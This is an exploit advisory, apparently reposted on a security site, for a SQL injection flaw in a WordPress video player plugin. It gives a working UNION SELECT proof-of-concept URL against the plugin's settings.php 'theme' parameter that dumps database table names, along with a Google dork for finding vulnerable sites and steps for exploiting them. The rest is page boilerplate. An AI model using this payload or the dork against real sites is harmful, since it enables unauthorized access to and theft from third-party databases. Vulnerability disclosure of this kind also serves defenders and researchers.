WordPress HTML5 and FLash PLayer Plugin SQL Injection

2014.10.25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# WordPress HTML5 and FLash PLayer Plugin SQL Injection # CWE: CWE-89 # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 24/10/2014 # Vendor Homepage: https://wordpress.org/plugins/player/ # Tested on: Windows 7 and Gnu/Linux # Google Dork: inurl: "Index of" +inurl:/wp-content/plugins/player/ # PoC : http://www.cXo.com.br/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,table_name,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from information_schema.tables where table_schema=database()-- # Xploit: Are vulnerable sites that have the settings.php file inside the dir /player/... ~ And after see this file we need plus this string on link "?playlist=1&theme=1" OR: ~ Search to parameters vuls from settings.php with google dorks.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top